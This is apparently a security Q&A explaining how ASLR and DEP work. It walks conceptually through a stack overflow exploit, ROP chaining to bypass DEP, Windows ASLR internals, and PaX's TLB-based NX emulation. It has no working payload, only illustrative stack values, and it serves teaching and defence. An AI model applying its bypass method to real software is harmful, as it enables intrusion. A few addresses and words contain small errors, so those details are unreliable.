How do ASLR and DEP work?

Address Space Layout Randomisation (ASLR) is a technology used to help prevent shellcode from being successful. It does this by randomly offsetting the location of modules and certain in-memory structures. Data Execution Prevention (DEP) prevents certain memory sectors, e.g. the stack, from being executed. When combined it becomes exceedingly difficult to exploit vulnerabilities in applications using shellcode or return-oriented programming (ROP) techniques.

First, let's look at how a normal vulnerability might be exploited. We'll skip all the details, but let's just say we're using a stack buffer overflow vulnerability. We've loaded a big blob of 0x41414141 values into our payload, and eip has been set to 0x41414141, so we know it's exploitable. We've then gone and used an appropriate tool (e.g. Metasploit's pattern_create.rb) to discover the offset of the value being loaded into eip. This is the start offset of our exploit code. To verify, we load 0x41 before this offset, 0x42424242 at the offset, and 0x43 after the offset.

In a non-ASLR and non-DEP process, the stack address is the same every time we run the process. We know exactly where it is in memory. So, let's see what the stack looks like with the test data we described above:

stack addr | value
-----------+----------
 000ff6a0  | 41414141
 000ff6a4  | 41414141
 000ff6a8  | 41414141
 000ff6aa  | 41414141
>000ff6b0  | 42424242   > esp points here
 000ff6b4  | 43434343
 000ff6b8  | 43434343

As we can see, esp points to 000ff6b0, which has been set to 0x42424242. The values prior to this are 0x41 and the values after are 0x43, as we said they should be. We now know that the address stored at 000ff6b0 will be jumped to. So, we set it to the address of some memory that we can control:

stack addr | value
-----------+----------
 000ff6a0  | 41414141
 000ff6a4  | 41414141
 000ff6a8  | 41414141
 000ff6aa  | 41414141
>000ff6b0  | 000ff6b4
 000ff6b4  | cccccccc
 000ff6b8  | 43434343

We've set the value at 000ff6b0 such that eip will be set to 000ff6b4 - the next offset in the stack. This will cause 0xcc to be executed, which is an int3 instruction. Since int3 is a software interrupt breakpoint, it'll raise an exception and the debugger will halt. This allows us to verify that the exploit was successful.

> Break instruction exception - code 80000003 (first chance)
[snip]
eip=000ff6b4

Now we can replace the memory at 000ff6b4 with shellcode, by altering our payload. This concludes our exploit.

In order to prevent these exploits from being successful, Data Execution Prevention was developed. DEP forces certain structures, including the stack, to be marked as non-executable. This is made stronger by CPU support with the No-Execute (NX) bit, also known as the XD bit, EVP bit, or XN bit, which allows the CPU to enforce execution rights at the hardware level. DEP was introduced in Linux in 2004 (kernel 2.6.8), and Microsoft introduced it in 2004 as part of WinXP SP2. Apple added DEP support when they moved to the x86 architecture in 2006. With DEP enabled, our previous exploit won't work:

> Access violation - code c0000005 (!!! second chance !!!)
[snip]
eip=000ff6b4

This fails because the stack is marked as non-executable, and we've tried to execute it. To get around this, a technique called Return-Oriented Programming (ROP) was developed. This involves looking for small snippets of code, called ROP gadgets, in legitimate modules within the process. These gadgets consist of one or more instructions, followed by a return. Chaining these together with appropriate values in the stack allows for code to be executed.

First, let's look at how our stack looks right now:

stack addr | value
-----------+----------
 000ff6a0  | 41414141
 000ff6a4  | 41414141
 000ff6a8  | 41414141
 000ff6aa  | 41414141
>000ff6b0  | 000ff6b4
 000ff6b4  | cccccccc
 000ff6b8  | 43434343

We know that we can't execute the code at 000ff6b4, so we have to find some legitimate code that we can use instead. Imagine that our first task is to get a value into the eax register. We search for a pop eax; ret combination somewhere in any module within the process. Once we've found one, let's say at 00401f60, we put its address into the stack:

stack addr | value
-----------+----------
 000ff6a0  | 41414141
 000ff6a4  | 41414141
 000ff6a8  | 41414141
 000ff6aa  | 41414141
>000ff6b0  | 00401f60
 000ff6b4  | cccccccc
 000ff6b8  | 43434343

When this shellcode is executed, we'll get an access violation again:

> Access violation - code c0000005 (!!! second chance !!!)
eax=cccccccc ebx=01020304 ecx=7abcdef0 edx=00000000 esi=7777f000 edi=0000f0f1
eip=43434343 esp=000ff6ba ebp=000ff6ff

The CPU has now done the following:

  • Jumped to the pop eax instruction at 00401f60.
  • Popped cccccccc off the stack, into eax.
  • Executed the ret, popping 43434343 into eip.
  • Thrown an access violation because 43434343 isn't a valid memory address.

Now, imagine that, instead of 43434343, the value at 000ff6b8 was set to the address of another ROP gadget. This would mean that pop eax gets executed, then our next gadget. We can chain gadgets together like this. Our ultimate goal is usually to find the address of a memory protection API, such as VirtualProtect, and mark the stack as executable. We'd then include a final ROP gadget to do a jmp esp equivilent instruction, and execute shellcode. We've successfully bypassed DEP!

In order to combat these tricks, ASLR was developed. ASLR involves randomly offsetting memory structures and module base addresses to make guessing the location of ROP gadgets and APIs very difficult.

On Windows Vista and 7, ASLR randomises the location of executables and DLLs in memory, as well as the stack and heaps. When an executable is loaded into memory, Windows gets the processor's timestamp counter (TSC), shifts it by four places, performs division mod 254, then adds 1. This number is then multiplied by 64KB, and the executable image is loaded at this offset. This means that there are 256 possible locations for the executable. Since DLLs are shared in memory across processes, their offsets are determined by a system-wide bias value that is computed at boot. The value is computed as the TSC of the CPU when the MiInitializeRelocations function is first called, shifted and masked into an 8-bit value. This value is computed only once per boot.

When DLLs are loaded, they go into a shared memory region between 0x50000000 and 0x78000000. The first DLL to be loaded is always ntdll.dll, which is loaded at 0x78000000 - bias * 0x100000, where bias is the system-wide bias value computed at boot. Since it would be trivial to compute the offset of a module if you know ntdll.dll's base address, the order in which modules are loaded is randomised too.

When threads are created, their stack base location is randomised. This is done by finding 32 appropriate locations in memory, then choosing one based on the current TSC shifted masked into a 5-bit value. Once the base address has been calculated, another 9-bit value is derived from the TSC to compute the final stack base address. This provides a high theoretical degree of randomness.

Finally, the location of heaps and heap allocations are randomised. This is computed as a 5-bit TSC-derived value multiplied by 64KB, giving a possible heap range of 00000000 to 001f0000.

When all of these mechanisms are combined with DEP, we are prevented from executing shellcode. This is because we cannot execute the stack, but we also don't know where any of our ROP instructions are going to be in memory. Certain tricks can be done with nop sleds to create a probabilistic exploit, but they are not entirely successful and aren't always possible to create.

The only way to reliably bypass DEP and ASLR is through an pointer leak. This is a situation where a value on the stack, at a reliable location, might be used to locate a usable function pointer or ROP gadget. Once this is done, it is sometimes possible to create a payload that reliably bypasses both protection mechanisms.

Sources:

  • Windows Internals 5th Edition - Mark Russinovich
  • An Analysis of ASLR in Windows Vista - Symantec
  • ASLR on Wikipedia
  • DEP on Wikipedia

Further reading:

  • Stack-based exploit writing - CoreLAN
  • Bypassing stack cookies, SafeSEH, SEHOP, HW DEP and ASLR - CoreLAN
  • Bypassing ASLR/DEP - exploit-db

To complement @Polynomial's self-answer: DEP can actually be enforced on older x86 machines (which predate the NX bit), but at a price.

The easy but limited way to do DEP on old x86 hardware is to use segment registers. With current operating systems on such systems, addresses are 32-bit values in a flat 4 GB address space, but internally each memory access implicitly uses a 32-bit address and a special 16-bit register, called a "segment register".

In so-called protected mode, segment registers point to an internal table (the "descriptor table" -- actually there are two such tables, but that's a technicality) and each entry in the table specifies the characteristics of the segment. In particular, the types of allowed accesses, and the size of the segment. Moreover, code execution implicitly uses the CS segment register, while data access uses mostly DS (and stack access, e.g. with the push and pop opcodes, uses SS). This allows the operating system to split the address space into two parts; the lower addresses being in range for both CS and DS, while the upper addresses being out of range for CS. For instance, the segment described by CS is made to be of size 512 MB. This means that any address beyond 0x20000000 will be accessible as data (read or written to using DS as base register) but execution attempts will use CS, at which point the CPU will raise an exception (which the kernel will convert into a suitable signal like SIGILL or SIGSEGV, usually implying the death of the offending process).

(Note that segments are applied on address space; the MMU is still active, on a lower layer, so the trick explained above is per-process.)

This is cheap to do: the x86 hardware does enforce segments, systematically (and the first 80386 was already doing it; actually, the 80286 already had such segments with boundaries, but only 16-bit offsets). We can usually forget them because sane operating systems set the segments to begin at offset zero and be 4 GB long, but setting them otherwise does not imply any overhead which we did not already have. However, as a DEP mechanism, it is inflexible: when some data block is requested from the kernel, the kernel must decide whether this is for code or not for code, because the boundary is fixed. We cannot decide to dynamically convert any given page between code-mode and data-mode.

The fun but somewhat more expensive way to do DEP uses something called PaX. To understand what it does, one must go into some details.

The MMU on x86 hardware uses in-memory tables, which describe the status of every 4 kB page in the address space. The address space is 4 GB, so there are 1048576 pages. Each page is described by a 32-bit entry in a sub-table; there are 1024 sub-tables, each holding 1024 entries, and there is one main table, with 1024 entries which point to the 1024 sub-tables. Each entry tells where the pointed-to object (a sub-table, or a page) is in RAM, or whether it is there at all, and what are its access rights. The root of the issue is that access rights are about privilege levels (kernel code vs userland) and only one bit for the access type, thus allowing "read-write" or "read-only". "Execution" is considered to be a kind of read access. Hence, the MMU has no notion of "execution" being distinct from data access. That which is readable, is executable.

(Since the Pentium Pro, back in the previous century, x86 processors know of another format for the tables, called PAE. It doubles the size of entries, which leaves room for addressing more physical RAM, and also adding a NX bit -- but that specific bit was implemented by the hardware only around 2004.)

However, there is a trick. RAM is slow. To perform a memory access, the processor must first read the main table to locate the sub-table that it must consult, then do another read to that sub-table, and only at that point does the processor know whether the memory access should be allowed or not, and where in physical RAM the accessed data really is. These are read accesses with full dependency (each access depends on the value read by the previous) so this pays full latency, which, on modern CPU, can represent hundreds of clock cycles. Therefore, the CPU includes a specific cache which contains the most recently accessed MMU table entries. This cache is the Translation Lookaside Buffer.

From the 80486 onwards, x86 CPU do not have one TLB, but two. Caching works on heuristics, and heuristics depend on access patterns, and access patterns for code tend to differ from access patterns for data. So the smart people at Intel/AMD/other found it worthwhile to have a TLB dedicated to code access (execution), and another for data access. Moreover, the 80486 has an opcode (invlpg) which can remove a specific entry from the TLB.

So the idea is the following: make the two TLB have different views of the same entry. All pages are marked in the tables (in RAM) as "absent", thus triggering an exception upon access. The kernel traps the exception, and the exception includes some data about the type of access, in particular whether it was for code execution, or not. The kernel then invalidates the newly read TLB entry (the one which says "absent"), then fills the entry in RAM with some rights which allow access, then forces one access of the needed type (either data read or code execution), which feeds the entry into the corresponding TLB, and only that one. The kernel then promptly sets the entry in RAM back to absent, and finally returns to the process (back to trying again the opcode which triggered the exception).

The net effect is that, when the execution comes back to the process code, the TLB for code or the TLB for data contains the appropriate entry, but the other TLB does not, and will not since the tables in RAM still say "absent". At that point, the kernel is in position to decide whether to allow execution or not, independently from whether it allows data access or not. It can thus enforce NX-like semantics.

The Devil hides in the details; in this case, there is room for a whole legion of demons. Such a dance with the hardware is not easy to implement properly. Especially on multi-core systems.

The overhead is the following: when an access is performed and the TLB does not contain the relevant entry, the tables in RAM must be accessed, and that alone implies losing a few hundred cycles. To that cost, PaX adds the overhead of the exception, and the management code which fills the right TLB, thus turning the "a few hundred cycles" into "a few thousand cycles". Fortunately, TLB misses are right. The PaX people claim to have measured a slowdown of as little as 2.7% on a big compilation job (this depends on the CPU type, though).

The NX bit makes all of this obsolete. Note that the PaX patchset also contains some other security-related features, such as ASLR, which is redundant with some functionality of newer official kernels.